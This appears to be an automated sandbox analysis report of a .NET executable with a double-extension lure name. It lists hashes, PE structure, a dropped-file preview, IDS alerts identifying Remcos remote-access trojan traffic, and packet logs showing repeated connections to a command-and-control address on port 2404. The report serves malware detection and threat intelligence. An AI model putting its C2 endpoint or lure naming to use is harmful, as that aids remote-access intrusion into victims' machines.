                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                      Category:dropped
                      Size (bytes):48786
                      Entropy (8bit):3.5854495362228453
                      Encrypted:false
                      SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                      MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                      SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                      SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                      SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                      Malicious:false
                      Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.960291398712237
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:Material requirements_1.pif.exe
                      File size:969'728 bytes
                      MD5:b10dbc0225aac52e8ee344602847a3cc
                      SHA1:4bedc08167e1f21c85593c730e29d10036e0b219
                      SHA256:7a12e9a93cb32e622b05613c160fbbfae2d379f5c255bfca02eb1b54fe1a78a8
                      SHA512:579827dda319cbf9edb3d9955f27e68952f4587d73166192a68ff8609032465d892c6f08e4b19454b24c27c4cce6ddb56fce2e7df3121458c4d1f7c78d5e6156
                      SSDEEP:24576:Pf5eTij5iglZLSD2fhawjyCcT4L3CbY5O+eB:X5CU5PlZLm2fhDcTBbY5O+eB
                      TLSH:B22523089788CFECCA590FBE14640F219770FB9044C3E7265A1A446B2DA7327D19A7BB
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.~g..............0.............r.... ........@.. ....................... ............@................................

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x4ede72
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x677E1864 [Wed Jan 8 06:17:08 2025 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      adc dh, byte ptr [esi+edx*2]
                      js 00007F6254B5C462h
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], al
                      add byte ptr [edx], al
                      add byte ptr [eax], al
                      add byte ptr [ebx], al
                      add byte ptr [eax], al
                      add byte ptr [eax+eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xede1f0x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x618.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xf00000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xebb9c0x54.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000xebe900xec000809e7e1081698863d9050125e0c0154fFalse0.9578371209613348data7.965477253296922IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0xee0000x6180x8005df6079168a109f629178aeb7d2eab67False0.3359375data3.4534780995024366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xf00000xc0x20015179598233edc28f61428422023fa21False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_VERSION0xee0900x388data0.4170353982300885
                      RT_MANIFEST0xee4280x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2025-01-09T12:40:05.780254+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54970987.120.116.2452404TCP
                      2025-01-09T12:40:08.414907+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971187.120.116.2452404TCP
                      2025-01-09T12:40:11.055869+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971387.120.116.2452404TCP
                      2025-01-09T12:40:14.057305+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971487.120.116.2452404TCP
                      2025-01-09T12:40:16.715765+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971587.120.116.2452404TCP
                      2025-01-09T12:40:19.333540+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971787.120.116.2452404TCP
                      2025-01-09T12:40:21.943828+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54973687.120.116.2452404TCP
                      2025-01-09T12:40:24.572495+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54975487.120.116.2452404TCP
                      2025-01-09T12:40:27.209878+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54977287.120.116.2452404TCP
                      2025-01-09T12:40:29.837074+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54978787.120.116.2452404TCP
                      2025-01-09T12:40:32.462267+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54980687.120.116.2452404TCP
                      2025-01-09T12:40:35.108834+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54982387.120.116.2452404TCP
                      2025-01-09T12:40:37.743738+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54983887.120.116.2452404TCP
                      2025-01-09T12:40:40.385934+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54985387.120.116.2452404TCP
                      2025-01-09T12:40:43.040411+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54986687.120.116.2452404TCP
                      2025-01-09T12:40:45.665483+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54988287.120.116.2452404TCP
                      2025-01-09T12:40:48.274038+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54989887.120.116.2452404TCP
                      2025-01-09T12:40:50.882902+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54991187.120.116.2452404TCP
                      2025-01-09T12:40:53.519985+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54992587.120.116.2452404TCP
                      2025-01-09T12:40:56.131088+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54994587.120.116.2452404TCP
                      2025-01-09T12:40:58.780329+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54996087.120.116.2452404TCP
                      2025-01-09T12:41:01.415862+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54997587.120.116.2452404TCP
                      2025-01-09T12:41:04.060693+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54999287.120.116.2452404TCP
                      2025-01-09T12:41:06.697404+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55000487.120.116.2452404TCP
                      2025-01-09T12:41:09.322940+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55000587.120.116.2452404TCP
                      2025-01-09T12:41:11.982686+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55000687.120.116.2452404TCP
                      2025-01-09T12:41:14.718409+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55000787.120.116.2452404TCP
                      2025-01-09T12:41:17.352580+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55000887.120.116.2452404TCP
                      2025-01-09T12:41:19.978592+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55000987.120.116.2452404TCP
                      2025-01-09T12:41:22.626778+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001087.120.116.2452404TCP
                      2025-01-09T12:41:25.280179+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001187.120.116.2452404TCP
                      2025-01-09T12:41:27.947950+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001287.120.116.2452404TCP
                      2025-01-09T12:41:30.625281+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001387.120.116.2452404TCP
                      2025-01-09T12:41:33.252560+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001487.120.116.2452404TCP
                      2025-01-09T12:41:35.824878+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001587.120.116.2452404TCP
                      2025-01-09T12:41:38.354220+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001687.120.116.2452404TCP
                      2025-01-09T12:41:40.854196+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001787.120.116.2452404TCP
                      2025-01-09T12:41:43.354145+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001887.120.116.2452404TCP
                      2025-01-09T12:41:45.823890+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55001987.120.116.2452404TCP
                      2025-01-09T12:41:48.282019+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002087.120.116.2452404TCP
                      2025-01-09T12:41:50.664690+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002187.120.116.2452404TCP
                      2025-01-09T12:41:53.063685+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002287.120.116.2452404TCP
                      2025-01-09T12:41:55.417279+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002387.120.116.2452404TCP
                      2025-01-09T12:41:57.764991+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002487.120.116.2452404TCP
                      2025-01-09T12:42:00.095133+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002587.120.116.2452404TCP
                      2025-01-09T12:42:02.370189+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002687.120.116.2452404TCP
                      2025-01-09T12:42:04.636656+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002787.120.116.2452404TCP
                      2025-01-09T12:42:06.887519+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002887.120.116.2452404TCP
                      2025-01-09T12:42:09.126589+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55002987.120.116.2452404TCP
                      2025-01-09T12:42:11.325361+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003087.120.116.2452404TCP
                      2025-01-09T12:42:13.501565+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003187.120.116.2452404TCP
                      2025-01-09T12:42:15.669064+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003287.120.116.2452404TCP
                      2025-01-09T12:42:17.809851+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003387.120.116.2452404TCP
                      2025-01-09T12:42:19.929670+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003487.120.116.2452404TCP
                      2025-01-09T12:42:22.246311+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003587.120.116.2452404TCP
                      2025-01-09T12:42:24.359128+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003687.120.116.2452404TCP
                      2025-01-09T12:42:26.434884+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003787.120.116.2452404TCP
                      2025-01-09T12:42:28.500791+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003887.120.116.2452404TCP
                      2025-01-09T12:42:30.525481+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55003987.120.116.2452404TCP
                      2025-01-09T12:42:32.576357+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004087.120.116.2452404TCP
                      2025-01-09T12:42:34.603195+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004187.120.116.2452404TCP
                      2025-01-09T12:42:36.586212+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004287.120.116.2452404TCP
                      2025-01-09T12:42:38.607820+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004387.120.116.2452404TCP
                      2025-01-09T12:42:40.625452+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004487.120.116.2452404TCP
                      2025-01-09T12:42:42.605652+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004587.120.116.2452404TCP
                      2025-01-09T12:42:44.595670+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004687.120.116.2452404TCP
                      2025-01-09T12:42:46.526926+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004787.120.116.2452404TCP
                      2025-01-09T12:42:48.488805+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004887.120.116.2452404TCP
                      2025-01-09T12:42:50.400825+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55004987.120.116.2452404TCP
                      2025-01-09T12:42:52.308655+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005087.120.116.2452404TCP
                      2025-01-09T12:42:54.239073+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005187.120.116.2452404TCP
                      2025-01-09T12:42:56.176972+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005287.120.116.2452404TCP
                      2025-01-09T12:42:58.073163+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005387.120.116.2452404TCP
                      2025-01-09T12:42:59.971189+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005487.120.116.2452404TCP
                      2025-01-09T12:43:02.008561+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005587.120.116.2452404TCP
                      2025-01-09T12:43:03.856990+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005687.120.116.2452404TCP
                      2025-01-09T12:43:05.736877+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005787.120.116.2452404TCP
                      2025-01-09T12:43:07.616989+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005887.120.116.2452404TCP
                      2025-01-09T12:43:09.462940+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55005987.120.116.2452404TCP
                      2025-01-09T12:43:11.294959+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006087.120.116.2452404TCP
                      2025-01-09T12:43:13.127494+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006187.120.116.2452404TCP
                      2025-01-09T12:43:14.970620+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006287.120.116.2452404TCP
                      2025-01-09T12:43:16.819208+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006387.120.116.2452404TCP
                      2025-01-09T12:43:18.658973+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006487.120.116.2452404TCP
                      2025-01-09T12:43:20.485486+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006587.120.116.2452404TCP
                      2025-01-09T12:43:22.309451+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006687.120.116.2452404TCP
                      2025-01-09T12:43:24.106540+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006787.120.116.2452404TCP
                      2025-01-09T12:43:25.901857+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006887.120.116.2452404TCP
                      2025-01-09T12:43:27.707179+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55006987.120.116.2452404TCP
                      2025-01-09T12:43:29.528329+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007087.120.116.2452404TCP
                      2025-01-09T12:43:31.310182+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007187.120.116.2452404TCP
                      2025-01-09T12:43:33.058075+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007287.120.116.2452404TCP
                      2025-01-09T12:43:34.811387+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007387.120.116.2452404TCP
                      2025-01-09T12:43:36.579695+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007487.120.116.2452404TCP
                      2025-01-09T12:43:38.322987+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007587.120.116.2452404TCP
                      2025-01-09T12:43:40.075533+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007687.120.116.2452404TCP
                      2025-01-09T12:43:41.826952+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007787.120.116.2452404TCP
                      2025-01-09T12:43:43.577002+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007887.120.116.2452404TCP
                      2025-01-09T12:43:45.327959+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55007987.120.116.2452404TCP
                      2025-01-09T12:43:47.057659+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008087.120.116.2452404TCP
                      2025-01-09T12:43:48.804026+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008187.120.116.2452404TCP
                      2025-01-09T12:43:50.545968+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008287.120.116.2452404TCP
                      2025-01-09T12:43:52.260026+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008387.120.116.2452404TCP
                      2025-01-09T12:43:53.981994+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008487.120.116.2452404TCP
                      2025-01-09T12:43:55.701456+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008587.120.116.2452404TCP
                      2025-01-09T12:43:57.419560+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008687.120.116.2452404TCP
                      2025-01-09T12:43:59.159624+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008787.120.116.2452404TCP
                      2025-01-09T12:44:00.893431+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008887.120.116.2452404TCP
                      2025-01-09T12:44:02.572468+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55008987.120.116.2452404TCP
                      2025-01-09T12:44:04.300919+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55009087.120.116.2452404TCP
                      2025-01-09T12:44:06.013244+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55009187.120.116.2452404TCP
                      2025-01-09T12:44:07.713576+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55009287.120.116.2452404TCP
                      2025-01-09T12:44:09.440523+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55009387.120.116.2452404TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 9, 2025 12:40:03.954257965 CET497092404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:04.158376932 CET24044970987.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:04.158476114 CET497092404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:04.163965940 CET497092404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:04.168755054 CET24044970987.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:05.780183077 CET24044970987.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:05.780253887 CET497092404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:05.780392885 CET497092404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:05.785128117 CET24044970987.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:06.792486906 CET497112404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:06.797250032 CET24044971187.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:06.797343969 CET497112404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:06.801162958 CET497112404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:06.805970907 CET24044971187.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:08.414829016 CET24044971187.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:08.414906979 CET497112404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:08.414971113 CET497112404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:08.419717073 CET24044971187.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:09.428344011 CET497132404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:09.433279991 CET24044971387.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:09.433358908 CET497132404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:09.437355995 CET497132404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:09.442140102 CET24044971387.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:11.055780888 CET24044971387.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:11.055869102 CET497132404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:11.055943966 CET497132404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:11.060672998 CET24044971387.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:12.057766914 CET497142404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:12.440633059 CET24044971487.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:12.440738916 CET497142404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:12.444406033 CET497142404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:12.449259043 CET24044971487.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:14.057197094 CET24044971487.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:14.057305098 CET497142404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:14.057373047 CET497142404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:14.062160015 CET24044971487.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:15.073535919 CET497152404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:15.078378916 CET24044971587.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:15.078484058 CET497152404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:15.082231998 CET497152404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:15.087054968 CET24044971587.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:16.715677977 CET24044971587.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:16.715764999 CET497152404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:16.715853930 CET497152404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:16.720664978 CET24044971587.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:17.729746103 CET497172404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:17.734621048 CET24044971787.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:17.734715939 CET497172404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:17.738823891 CET497172404192.168.2.587.120.116.245
                      Jan 9, 2025 12:40:17.743556976 CET24044971787.120.116.245192.168.2.5
                      Jan 9, 2025 12:40:19.333465099 CET24044971787.120.116.245192.168.2.5
